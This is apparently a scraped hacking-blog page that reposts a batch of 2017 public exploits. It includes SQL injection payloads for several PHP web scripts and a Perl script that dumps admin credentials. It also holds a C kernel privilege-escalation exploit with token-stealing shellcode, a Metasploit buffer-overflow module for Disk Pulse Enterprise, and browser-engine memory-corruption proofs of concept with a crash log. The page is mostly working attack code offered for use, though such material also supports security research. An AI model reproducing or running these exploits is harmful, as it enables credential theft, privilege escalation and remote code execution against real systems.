# # # # #
# Exploit Title: Contact Manager 1.0 - SQL Injection
# Dork: N/A
# Date: 15.09.2017
# Vendor Homepage: http://savsofteproducts.com/
# Software Link: http://www.contactmanagerscript.com/download/contact_manager_1380185909.zip
# Demo: http://contactmanagerscript.com/demo/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Vulnerable Source:
#
# .............
# <a href="login.php?forgot=1">Forgot Password ?</a>
# <?php
# if(isset($_REQUEST["forgot"])){
# if($_REQUEST["forgot"]=="2"){
# $result=mysql_query("select * from co_setting where Email='$_REQUEST[femail]' ");
# $count=mysql_num_rows($result);
# if($count==1)
#
# {
#
# $npass=rand("5556","99999");
#
# $to = $row['femail'];
# $subject = "Password Reset";
# $message = "New Primary Password is: $npass \r\n";
# $headers = "From: $Email";
#
# $npass=md5($npass);
#
# $query="update co_setting set Password='$npass' where Email='$_REQUEST[femail]'";
# mysql_query($query);
# .............
#
# Proof of Concept:
#
# http://localhost/[PATH]/login.php?forgot=2&femail=[SQL]
#
# Etc..
# # # # #
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863588245
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# # # # #
# Exploit Title: PTCEvolution 5.50 - SQL Injection
# Dork: N/A
# Date: 15.09.2017
# Vendor Homepage: http://ptcevolution.com/
# Software Link: http://www.ptcevolution.com/demoo/
# Demo: http://demo.ptcevolution.com/
# Version: 5.50
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?view=product&id=[SQL]
# http://localhost/[PATH]/index.php?view=products&id=[SQL]
#
# -4++/*!03333UNION*/(/*!03333SELECT*/+(1),(/*!03333Select*/+export_set(5,@:=0,(/*!03333select*/+count(*)/*!03333from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!03333table_name*/,0x3c6c693e,2),/*!03333column_name*/,0xa3a,2)),@,2)),(3),(4),(5),(6),(7),(8),(9))--+-
#
# Etc..
# # # # #
// Netdecision.cpp : Defines the entry point for the console application.
/*
# Exploit Title: Netdecision 5.8.2 - Local Privilege Escalation - Winring0x32.sys
# Date: 2017.09.17
# Exploit Author: Peter Baris
# Vendor Homepage: www.netmechanica.com
# Software Link: http://www.netmechanica.com/downloads/ //registration required
# Version: 5.8.2
# Tested on: Windows 7 Pro SP1 x86 / Windows 7 Enterprise SP1
# CVE : CVE-2017-14311
Vendor notified on 2017.09.11 - no response */
#include "stdafx.h"
#include <stdio.h>
#include <Windows.h>
#include <winioctl.h>
#include <tlhelp32.h>
#include <Psapi.h>
#define DEVICE_NAME L"\\\\.\\WinRing0_1_2_0"
LPCTSTR FileName = (LPCTSTR)DEVICE_NAME;
HANDLE GetDeviceHandle(LPCTSTR FileName) {
HANDLE hFile = NULL;
hFile = CreateFile(FileName,
GENERIC_READ | GENERIC_WRITE,
0,
0,
OPEN_EXISTING,
NULL,
0);
return hFile;
}
extern ULONG ZwYieldExecution = NULL;
extern PVOID KernelBaseAddressInKernelMode = NULL;
extern HMODULE hKernelInUserMode = NULL;
VOID GetKiFastSystemCall() {
SIZE_T ReturnLength;
HMODULE hntdll = NULL;
ULONG ZwYieldExecution_offset;
hntdll = LoadLibraryA("ntdll.dll");
if (!hntdll) {
printf("[-] Failed to Load ntdll.dll: 0x%X\n", GetLastError());
exit(EXIT_FAILURE);
}
LPVOID drivers[1024];
DWORD cbNeeded;
EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded);
KernelBaseAddressInKernelMode = drivers[0];
printf("[+] Kernel base address: 0x%X\n", KernelBaseAddressInKernelMode);
hKernelInUserMode = LoadLibraryA("ntkrnlpa.exe");
if (!hKernelInUserMode) {
printf("[-] Failed to load kernel: 0x%X\n", GetLastError());
exit;
}
printf("[+] KernelImage Base in User-Mode 0x%X\r\n", hKernelInUserMode);
ZwYieldExecution = GetProcAddress(hKernelInUserMode, "ZwYieldExecution");
if (!ZwYieldExecution) {
printf("[-] Failed to resolve KiFastSystemCall: 0x%X\n", GetLastError());
exit;
}
ZwYieldExecution_offset = (ULONG)ZwYieldExecution - (ULONG)hKernelInUserMode;
printf("[+] ZwYieldExecution's offset address in ntkrnlpa.exe: 0x%X\n", ZwYieldExecution_offset);
(ULONG)ZwYieldExecution = (ULONG)ZwYieldExecution_offset + (ULONG)KernelBaseAddressInKernelMode;
printf("[+] ZwYieldExecution's address in kernel-mode: 0x%X\n", ZwYieldExecution);
if (hntdll) {
FreeLibrary(hntdll);
}
if (hKernelInUserMode) {
FreeLibrary(hKernelInUserMode);
}
hntdll = NULL;
return hKernelInUserMode;
return ZwYieldExecution;
}
extern ULONG eip = NULL;
extern ULONG pesp = NULL;
extern ULONG pebp = NULL;
extern ULONG ETHREAD = NULL;
ULONG Shellcode() {
ULONG FunctionAddress = ZwYieldExecution;
__asm {
pushad
pushfd
xor eax,eax
mov edi, FunctionAddress ; Address of ZwYieldExection to EDI
SearchCall:
mov eax, 0xe8
scasb
jnz SearchCall
mov ebx, edi
mov ecx, [edi]
add ebx, ecx; EBX points to KiSystemService
add ebx, 0x4
lea edi, [ebx - 0x1]
SearchFastCallEntry:
mov eax, 0x00000023
scasd
jnz SearchFastCallEntry
mov eax, 0xa10f306a
scasd
jnz SearchFastCallEntry
lea eax,[edi-0x9]
xor edx, edx
mov ecx, 0x176
wrmsr
popfd
popad
mov eax,ETHREAD
mov eax,[eax]
mov eax, [eax+0x050]
mov ecx, eax
mov edx, 0x4
FindSystemProcess :
mov eax, [eax + 0x0B8]
sub eax, 0x0B8
cmp[eax + 0x0B4], edx
jne FindSystemProcess
mov edx, [eax + 0x0F8]
mov[ecx + 0x0F8], edx
;xor eax, eax
mov esp,pesp
mov ebp,pebp
push eip
; int 3
ret
}
}
int main()
{
HANDLE hlib = NULL;
HANDLE hFile = NULL;
PVOID lpInBuffer = NULL;
ULONG lpOutBuffer = NULL;
ULONG lpBytesReturned;
PVOID BuffAddress = NULL;
SIZE_T BufferSize = 0x1000;
SIZE_T nOutBufferSize = 0x800;
ULONG Interval = 0;
ULONG Shell = &Shellcode;
NTSTATUS NtStatus = NULL;
/* Undocumented feature to trigger the vulnerability */
hlib = LoadLibraryA("ntdll.dll");
if (!hlib) {
printf("[-] Failed to load the library: 0x%X\n", GetLastError());
exit(EXIT_FAILURE);
}
GetKiFastSystemCall();
/* Allocate memory for our input and output buffers */
lpInBuffer = VirtualAlloc(NULL, BufferSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
/*Getting KiFastSystemCall address from ntdll.dll to restore it in 0x176 MSR*/
lpOutBuffer = VirtualAlloc(NULL, BufferSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
//printf("[+] Address to write our shellcode's address to: 0x%X\r\n", lpOutBuffer);
/* Crafting the input buffer */
BuffAddress = (PVOID)(((ULONG)lpInBuffer));
*(PULONG)BuffAddress = (ULONG)0x00000176; /*IA32_SYSENTER_EIP MSR*/
BuffAddress = (PVOID)(((ULONG)lpInBuffer + 0x4));
*(PULONG)BuffAddress = (ULONG)Shell; /*Our assembly shellcode Pointer into EAX*/
BuffAddress = (PVOID)(((ULONG)lpInBuffer + 0x8));
*(PULONG)BuffAddress = (ULONG)0x00000000; /* EDX is 0x00000000 in 32bit mode */
BuffAddress = (PVOID)(((ULONG)lpInBuffer + 0xc));
*(PULONG)BuffAddress = (ULONG)0x00000000;
//RtlFillMemory(lpInBuffer, BufferSize, 0x41);
//RtlFillMemory(lpOutBuffer, BufferSize, 0x42);
//printf("[+] Trying the get the handle for the WinRing0_1_2_0 device.\r\n");
hFile = GetDeviceHandle(FileName);
if (hFile == INVALID_HANDLE_VALUE) {
printf("[-] Can't get the device handle. 0x%X\r\n", GetLastError());
return 1;
}
else
{
printf("[+] Handle opened for WinRing0x32. Sending IOCTL.\r\n");
}
/*Here we calculate the EIP for our return from kernel-mode. This exploit does not let us simply adjust the stack and return*/
(HANDLE)eip = GetModuleHandleA(NULL); /*Getting the base address of our process*/
printf("[+] Current process base address 0x%X\r\n", (HANDLE)eip);
(HANDLE)eip = eip + 0x13ae; /*Any time you change something in the main() section you MUST adjust the offset to point to the PUSH 40 instrction*/
printf("[+] Return address (EIP) from kernel-mode 0x%X\r\n", (HANDLE)eip);
/*Setting CPU affinity before execution to maximize the chance of executing our code on the same CPU core*/
DWORD_PTR i = 1; /*CPU Core with ID 1 will be always chosen for the execution*/
ULONG affinity = SetThreadAffinityMask(GetCurrentThread(), i);
printf("[+] Setting affinity for logical CPU with ID:%d\r\n", i);
if (affinity == NULL) {
printf("[-] Something went wrong while setting CPU affinity 0x%X\r\n", GetLastError());
exit(1);
}
ETHREAD = (ULONG)KernelBaseAddressInKernelMode + 0x12bd24; /*Offset to nt!KiInitialThread as TEB is not readable*/
/*Saving stack pointer and stack frame of user-mode before diving in kernel-mode to restore it before returning to user-mode */
__asm {
mov pesp, esp
mov pebp, ebp
nop
}
DeviceIoControl(hFile,
0x9C402088,
lpInBuffer,
0x10,
lpOutBuffer,
0x20,
&lpBytesReturned,
NULL);
STARTUPINFO info = { sizeof(info) };
PROCESS_INFORMATION processInfo;
NTSTATUS proc;
LPCSTR command = L"C:\\Windows\\System32\\cmd.exe";
proc = CreateProcess(command, NULL, NULL, NULL, FALSE, 0, NULL, NULL, &info, &processInfo);
if (!proc) {
printf("ERROR 0x%X\r\n", proc);
}
WaitForSingleObject(processInfo.hProcess, INFINITE);
exit(0);
}
# Exploit Title: iTech Gigs Script v1.20 - SQL Injection
# Date: 2017-09-15
# Exploit Author: 8bitsec
# Vendor Homepage: http://itechscripts.com/
# Software Link: http://itechscripts.com/the-gigs-script/
# Version: 1.20
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2017-09-15
Product & Service Introduction:
===============================
Designed to launch an online market place facilitating participation of professionals from diverse walks of life.
Technical Details & Description:
================================
SQL injection on [cat] parameter.
Proof of Concept (PoC):
=======================
SQLi:
http://localhost/[path]/browse-category.php?cat=xxxxx' AND 4079=4079 AND 'zpSy'='zpSy
Parameter: cat (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cat=10c4ca4238a0b923820dcc509a6f75849b' AND 4079=4079 AND 'zpSy'='zpSy
==================
8bitsec - [https://twitter.com/_8bitsec]
#!/usr/bin/perl -w
# # # # #
# Exploit Title: Stock Photo Selling Script 1.0 - SQL Injection
# Dork: N/A
# Date: 21.09.2017
# Vendor Homepage: http://sixthlife.net/
# Software Link: http://sixthlife.net/product/stock-photo-selling-website/
# Demo: http://www.photoreels.com/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
sub clear{
system(($^O eq 'MSWin32') ? 'cls' : 'clear'); }
clear();
print "
################################################################################
#### ## ## ###### ### ## ##
## ## ## ## ## ## ## ### ##
## ## ## ## ## ## #### ##
## ######### ###### ## ## ## ## ##
## ## ## ## ######### ## ####
## ## ## ## ## ## ## ## ###
#### ## ## ###### ## ## ## ##
###### ######## ## ## ###### ### ## ##
## ## ## ### ## ## ## ## ## ### ##
## ## #### ## ## ## ## #### ##
###### ###### ## ## ## ## ## ## ## ## ##
## ## ## #### ## ######### ## ####
## ## ## ## ### ## ## ## ## ## ###
###### ######## ## ## ###### ## ## ## ##
Stock Photo Selling Script 1.0 - SQL Injection
################################################################################
";
use LWP::UserAgent;
print "\nInsert Target:[http://site.com/path/]: ";
chomp(my $target=<STDIN>);
print "\n[!] Exploiting Progress.....\n";
print "\n";
$tt="tbl_configurations";
$cc="(/*!00007SELECT*/%20GROUP_CONCAT(0x3c74657874617265613e,0x557365726e616d653a,admin_name,0x2020202020,0x50617373776f72643a,admin_password,0x3c2f74657874617265613e%20SEPARATOR%200x3c62723e)%20/*!00007FROM*/%20".$tt.")";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0');
$host = $target . "photo_view.php?photo_sid=-d1fe173d08e959397adf34b1d77e88d7'%20%20/*!00007UNION*/(/*!00007SELECT*/%200x283129,0x283229,0x283329,".$cc.",0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x28333429,0x28333529,0x28333629,0x28333729,0x28333829,0x28333929,0x28343029,0x28343129,0x28343229,0x28343329,0x28343429,0x28343529,0x28343629)--%20-";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/<textarea>(.*?)<\/textarea>/){
print "[+] Success !!!\n";
print "\n[+] Admin Detail : $1\n";
print "\n[+]$target/admin/index.php?mod=login\n";
print "\n";
}
else{print "\n[-]Not found.\n";
}
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Disk Pulse Enterprise GET Buffer Overflow',
'Description' => %q(
This module exploits an SEH buffer overflow in Disk Pulse Enterprise
9.9.16. If a malicious user sends a crafted HTTP GET request
it is possible to execute a payload that would run under the Windows
NT AUTHORITY\SYSTEM account.
),
'License' => MSF_LICENSE,
'Author' =>
[
'Chance Johnson', # msf module - albatross@loftwing.net
'Nipun Jaswal & Anurag Srivastava' # Original discovery -- www.pyramidcyber.com
],
'References' =>
[
[ 'EDB', '42560' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Platform' => 'win',
'Payload' =>
{
'EncoderType' => "alpha_mixed",
'BadChars' => "\x00\x0a\x0d\x26"
},
'Targets' =>
[
[ 'Disk Pulse Enterprise 9.9.16',
{
'Ret' => 0x1013ADDD, # POP EDI POP ESI RET 04 -- libpal.dll
'Offset' => 2492
}]
],
'Privileged' => true,
'DisclosureDate' => 'Aug 25 2017',
'DefaultTarget' => 0))
register_options([Opt::RPORT(80)])
end
def check
res = send_request_cgi(
'uri' => '/',
'method' => 'GET'
)
if res && res.code == 200 && res.body =~ /Disk Pulse Enterprise v9\.9\.16/
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def exploit
connect
print_status("Generating exploit...")
exp = payload.encoded
exp << 'A' * (target['Offset'] - payload.encoded.length) # buffer of trash until we get to offset
exp << generate_seh_record(target.ret)
exp << make_nops(10) # NOP sled to make sure we land on jmp to shellcode
exp << "\xE9\x25\xBF\xFF\xFF" # jmp 0xffffbf2a - jmp back to shellcode start
exp << 'B' * (5000 - exp.length) # padding
print_status("Sending exploit...")
send_request_cgi(
'uri' => '/../' + exp,
'method' => 'GET',
'host' => '4.2.2.2',
'connection' => 'keep-alive'
)
handler
disconnect
end
end
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1327
Here's the method used to re-parse asmjs modules.
void JavascriptFunction::ReparseAsmJsModule(ScriptFunction** functionRef)
{
ParseableFunctionInfo* functionInfo = (*functionRef)->GetParseableFunctionInfo();
Assert(functionInfo);
functionInfo->GetFunctionBody()->AddDeferParseAttribute();
functionInfo->GetFunctionBody()->ResetEntryPoint();
functionInfo->GetFunctionBody()->ResetInParams();
FunctionBody * funcBody = functionInfo->Parse(functionRef);
#if ENABLE_PROFILE_INFO
// This is the first call to the function, ensure dynamic profile info
funcBody->EnsureDynamicProfileInfo();
#endif
(*functionRef)->UpdateUndeferredBody(funcBody);
}
First, it resets the function body and then re-parses it. But it doesn't consider that "functionInfo->Parse(functionRef);" may throw an exception. So in the case, the function body remains reseted(invalid).
We can make it throw an exception simply by exhausting the stack.
PoC:
-->
function Module() {
'use asm';
function f() {
}
return f;
}
function recur() {
try {
recur();
} catch (e) {
Module(1);
}
}
recur();
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1308
When the Chakra's parser meets "{", at first, Chakra treats it as an object literal without distinguishing whether it will be an object literal(i.e., {a: 0x1234}) or an object pattern(i.e., {a} = {a: 1234}). After finishing to parse it using "Parser::ParseTerm", if it's an object pattern, Chakra converts it to an object pattern using the "ConvertObjectToObjectPattern" method.
The problem is that "Parser::ParseTerm" also parses ".", etc. using "ParsePostfixOperators" without proper checks. As a result, an invalid syntax(i.e., {b = 0x1111...}.c) can be parsed and "ConvertObjectToObjectPattern" will fail to convert it to an object pattern.
In the following PoC, "ConvertObjectToObjectPattern" skips "{b = 0x1111...}.c". So the object literal will have incorrect members(b = 0x1111, c = 0x2222), this leads to type confusion(Chakra will think "c" is a setter and try to call it).
PoC:
-->
function f() {
({
a: {
b = 0x1111,
c = 0x2222,
}.c = 0x3333
} = {});
}
f();
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1326
In Javascript, the code executed by a direct call to eval shares the caller block's scopes. Chakra handles this from the parser. And there's a bug when it parses "eval" in a catch statement's param.
ParseNodePtr Parser::ParseCatch()
{
...
pnodeCatchScope = StartParseBlock<buildAST>(PnodeBlockType::Regular, isPattern ? ScopeType_CatchParamPattern : ScopeType_Catch);
...
ParseNodePtr pnodePattern = ParseDestructuredLiteral<buildAST>(tkLET, true /*isDecl*/, true /*topLevel*/, DIC_ForceErrorOnInitializer);
...
}
1. "pnodeCatchScope" is a temporary block used to create a scope, and it is not actually inserted into the AST.
2. If the parser meets "eval" in "ParseDestructuredLiteral", it calls "pnodeCatchScope->SetCallsEval".
3. But "pnodeCatchScope" is not inserted into the AST. So the bytecode generator doesn't know it calls "eval", and it can't create scopes properly.
PoC:
-->
function f() {
{
let i;
function g() {
i;
}
try {
throw 1;
} catch ({e = eval('dd')}) {
}
}
}
f();
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1310
(function f(a = (function () {
print(a);
with ({});
})()) {
function g() {
f;
}
})();
When Chakra executes the above code, it doesn't generate bytecode for "g". This is a feature called "DeferParse". The problem is that the bytecode generated for "f" when the feature is enabled is different to the bytecode generated when the feature is disabled. This is because of "ByteCodeGenerator::ProcessScopeWithCapturedSym" which changes the function expression scope's type is not called when the feature is enabled.
Here's a snippet of the method which emits an incorrect opcode.
void ByteCodeGenerator::LoadAllConstants(FuncInfo *funcInfo)
{
...
if (funcExprWithName)
{
if (funcInfo->GetFuncExprNameReference() ||
(funcInfo->funcExprScope && funcInfo->funcExprScope->GetIsObject()))
{
...
Js::RegSlot ldFuncExprDst = sym->GetLocation();
this->m_writer.Reg1(Js::OpCode::LdFuncExpr, ldFuncExprDst);
if (sym->IsInSlot(funcInfo))
{
Js::RegSlot scopeLocation;
AnalysisAssert(funcInfo->funcExprScope);
if (funcInfo->funcExprScope->GetIsObject())
{
scopeLocation = funcInfo->funcExprScope->GetLocation();
this->m_writer.Property(Js::OpCode::StFuncExpr, sym->GetLocation(), scopeLocation,
funcInfo->FindOrAddReferencedPropertyId(sym->GetPosition()));
}
else if (funcInfo->bodyScope->GetIsObject())
{
this->m_writer.ElementU(Js::OpCode::StLocalFuncExpr, sym->GetLocation(),
funcInfo->FindOrAddReferencedPropertyId(sym->GetPosition()));
}
else
{
Assert(sym->HasScopeSlot());
this->m_writer.SlotI1(Js::OpCode::StLocalSlot, sym->GetLocation(),
sym->GetScopeSlot() + Js::ScopeSlots::FirstSlotIndex);
}
}
...
}
}
...
}
As you can see, it only handles "funcExprScope->GetIsObject()" or "bodyScope->GetIsObject()" but not "paramScope->GetIsObject()".
Without the feature, there's no case that only "paramScope->GetIsObject()" returns true because "ByteCodeGenerator::ProcessScopeWithCapturedSym" for "f" is always called and makes "funcInfo->funcExprScope->GetIsObject()" return true.
But with the feature, the method is not called. So it ends up emitting an incorrect opcode "Js::OpCode::StLocalSlot".
The feature is enabled in Edge by default.
PoC:
-->
let h = function f(a0 = (function () {
a0;
a1;
a2;
a3;
a4;
a5;
a6;
a7 = 0x99999; // oob write
with ({});
})(), a1, a2, a3, a4, a5, a6, a7) {
function g() {
f;
}
};
for (let i = 0; i < 0x10000; i++) {
h();
}
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1309
There is a security issue in Microsoft Edge related to how HTML documents are loaded. If Edge displays a HTML document from a slow HTTP server, it is possible that a part of the document is going to be rendered before the server has finished sending the document. It is also possible that some JavaScript code is going to trigger.
By making DOM modifications before the document had a chance of fully loading, followed by another set of DOM modifications afer the page has been loaded, it is possible to trigger memory corruption that could possibly lead to an exploitable condition.
A debug log is included below. Note that the crash RIP directly preceeds a (CFG-protected) indirect call, which demonstrates the exploitability of the issue.
Since a custom HTTP server is needed to demonstrate the issue, I'm attaching all of the required code. Simply run server.py and point Edge to http://127.0.0.1:8000/
Note: this has been tested on Microsoft Edge 38.14393.1066.0 (Microsoft EdgeHTML 14.14393)
Debug log:
=========================================
(a68.9c0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0x1389aa:
00007ffa`9d5f15ea 488b01 mov rax,qword ptr [rcx] ds:00000000`abcdbbbb=????????????????
0:013> k
# Child-SP RetAddr Call Site
00 000000eb`c42f8da0 00007ffa`9d8b243d edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0x1389aa
01 000000eb`c42f8dd0 00007ffa`9d8b28e2 edgehtml!Collections::SGrowingArray<TSmartPointer<Tree::ANode,CStrongReferenceTraits> >::DeleteAt+0x89
02 000000eb`c42f8e00 00007ffa`9d8b0cd7 edgehtml!Undo::UndoNodeList::RemoveNodesCompletelyContained+0x5e
03 000000eb`c42f8e30 00007ffa`9d8ad79b edgehtml!Undo::WrapUnwrapNodeUndoUnit::RemoveNodesAtOldPosition+0x33
04 000000eb`c42f8e70 00007ffa`9d5b303d edgehtml!Undo::MoveForestUndoUnit::HandleWrapUnwrap+0x6b
05 000000eb`c42f8f10 00007ffa`9d8ac629 edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0xfa3fd
06 000000eb`c42f8f60 00007ffa`9d5b3085 edgehtml!Undo::ParentUndoUnit::ApplyScriptedOperationToChildren+0xb5
07 000000eb`c42f8ff0 00007ffa`9d11035c edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0xfa445
08 000000eb`c42f9040 00007ffa`9d110125 edgehtml!Undo::UndoManager::ApplyScriptedOperationsToUserUnits+0x11c
09 000000eb`c42f9130 00007ffa`9d1d6f0d edgehtml!Undo::UndoManager::SubmitUndoUnit+0x125
0a 000000eb`c42f9170 00007ffa`9dc9c9ae edgehtml!CSelectionManager::CreateAndSubmitSelectionUndoUnit+0x141
0b 000000eb`c42f9200 00007ffa`9dc90b70 edgehtml!CRemoveFormatBaseCommand::PrivateExec+0xae
0c 000000eb`c42f92c0 00007ffa`9dc9057a edgehtml!CCommand::Exec+0xe8
0d 000000eb`c42f9350 00007ffa`9d55e481 edgehtml!CMshtmlEd::Exec+0x17a
0e 000000eb`c42f93b0 00007ffa`9d39cc34 edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0xa5841
0f 000000eb`c42f9470 00007ffa`9d21d6a1 edgehtml!CDoc::ExecHelper+0x5d18
10 000000eb`c42fb020 00007ffa`9d1dbb57 edgehtml!CDocument::Exec+0x41
11 000000eb`c42fb070 00007ffa`9d1dba25 edgehtml!CBase::execCommand+0xc7
12 000000eb`c42fb0f0 00007ffa`9d1db8ac edgehtml!CDocument::execCommand+0x105
13 000000eb`c42fb2e0 00007ffa`9d498155 edgehtml!CFastDOM::CDocument::Trampoline_execCommand+0x124
14 000000eb`c42fb3f0 00007ffa`9c930e37 edgehtml!CFastDOM::CDocument::Profiler_execCommand+0x25
15 000000eb`c42fb420 00007ffa`9c9e9073 chakra!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x177
16 000000eb`c42fb500 00007ffa`9c9596cd chakra!amd64_CallFunction+0x93
17 000000eb`c42fb560 00007ffa`9c95cec7 chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<0> > > >+0x15d
18 000000eb`c42fb600 00007ffa`9c960f52 chakra!Js::InterpreterStackFrame::OP_ProfiledCallIWithICIndex<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<0> > >+0xa7
19 000000eb`c42fb680 00007ffa`9c95f1b2 chakra!Js::InterpreterStackFrame::ProcessProfiled+0x132
1a 000000eb`c42fb710 00007ffa`9c963280 chakra!Js::InterpreterStackFrame::Process+0x142
1b 000000eb`c42fb770 00007ffa`9c9649c5 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4a0
1c 000000eb`c42fbad0 00000284`bf4b0fa2 chakra!Js::InterpreterStackFrame::InterpreterThunk+0x55
1d 000000eb`c42fbb20 00007ffa`9c9e9073 0x00000284`bf4b0fa2
1e 000000eb`c42fbb50 00007ffa`9c9580c3 chakra!amd64_CallFunction+0x93
1f 000000eb`c42fbba0 00007ffa`9c95abc0 chakra!Js::JavascriptFunction::CallFunction<1>+0x83
20 000000eb`c42fbc00 00007ffa`9c95f65d chakra!Js::InterpreterStackFrame::OP_CallI<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > >+0x110
21 000000eb`c42fbc50 00007ffa`9c95f217 chakra!Js::InterpreterStackFrame::ProcessUnprofiled+0x32d
22 000000eb`c42fbce0 00007ffa`9c963280 chakra!Js::InterpreterStackFrame::Process+0x1a7
23 000000eb`c42fbd40 00007ffa`9c9649c5 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4a0
24 000000eb`c42fc090 00000284`bf4b0faa chakra!Js::InterpreterStackFrame::InterpreterThunk+0x55
25 000000eb`c42fc0e0 00007ffa`9c9e9073 0x00000284`bf4b0faa
26 000000eb`c42fc110 00007ffa`9c9580c3 chakra!amd64_CallFunction+0x93
27 000000eb`c42fc160 00007ffa`9c98ce3c chakra!Js::JavascriptFunction::CallFunction<1>+0x83
28 000000eb`c42fc1c0 00007ffa`9c98c406 chakra!Js::JavascriptFunction::CallRootFunctionInternal+0x104
29 000000eb`c42fc2b0 00007ffa`9c9ce4d9 chakra!Js::JavascriptFunction::CallRootFunction+0x4a
2a 000000eb`c42fc320 00007ffa`9c9928a1 chakra!ScriptSite::CallRootFunction+0xb5
2b 000000eb`c42fc3c0 00007ffa`9c98e45c chakra!ScriptSite::Execute+0x131
2c 000000eb`c42fc450 00007ffa`9d333b2d chakra!ScriptEngineBase::Execute+0xcc
2d 000000eb`c42fc4f0 00007ffa`9d333a78 edgehtml!CJScript9Holder::ExecuteCallbackDirect+0x3d
2e 000000eb`c42fc540 00007ffa`9d35ac27 edgehtml!CJScript9Holder::ExecuteCallback+0x18
2f 000000eb`c42fc580 00007ffa`9d35aa17 edgehtml!CListenerDispatch::InvokeVar+0x1fb
30 000000eb`c42fc700 00007ffa`9d33247a edgehtml!CListenerDispatch::Invoke+0xdb
31 000000eb`c42fc780 00007ffa`9d415a62 edgehtml!CEventMgr::_InvokeListeners+0x2ca
32 000000eb`c42fc8e0 00007ffa`9d290715 edgehtml!CEventMgr::_InvokeListenersOnWindow+0x66
33 000000eb`c42fc910 00007ffa`9d2901a3 edgehtml!CEventMgr::Dispatch+0x405
34 000000eb`c42fcbe0 00007ffa`9d37434a edgehtml!CEventMgr::DispatchEvent+0x73
35 000000eb`c42fcc30 00007ffa`9d3ac5a2 edgehtml!COmWindowProxy::Fire_onload+0x14e
36 000000eb`c42fcd40 00007ffa`9d3ab23e edgehtml!CMarkup::OnLoadStatusDone+0x376
37 000000eb`c42fce00 00007ffa`9d3aa72f edgehtml!CMarkup::OnLoadStatus+0x112
38 000000eb`c42fce30 00007ffa`9d328d93 edgehtml!CProgSink::DoUpdate+0x3af
39 000000eb`c42fd2c0 00007ffa`9d32a550 edgehtml!GlobalWndOnMethodCall+0x273
3a 000000eb`c42fd3c0 00007ffa`b7a31c24 edgehtml!GlobalWndProc+0x130
3b 000000eb`c42fd480 00007ffa`b7a3156c user32!UserCallWinProcCheckWow+0x274
3c 000000eb`c42fd5e0 00007ffa`9347d421 user32!DispatchMessageWorker+0x1ac
3d 000000eb`c42fd660 00007ffa`9347c9e1 EdgeContent!CBrowserTab::_TabWindowThreadProc+0x4a1
3e 000000eb`c42ff8b0 00007ffa`ad7e9586 EdgeContent!LCIETab_ThreadProc+0x2c1
3f 000000eb`c42ff9d0 00007ffa`b7978364 iertutil!_IsoThreadProc_WrapperToReleaseScope+0x16
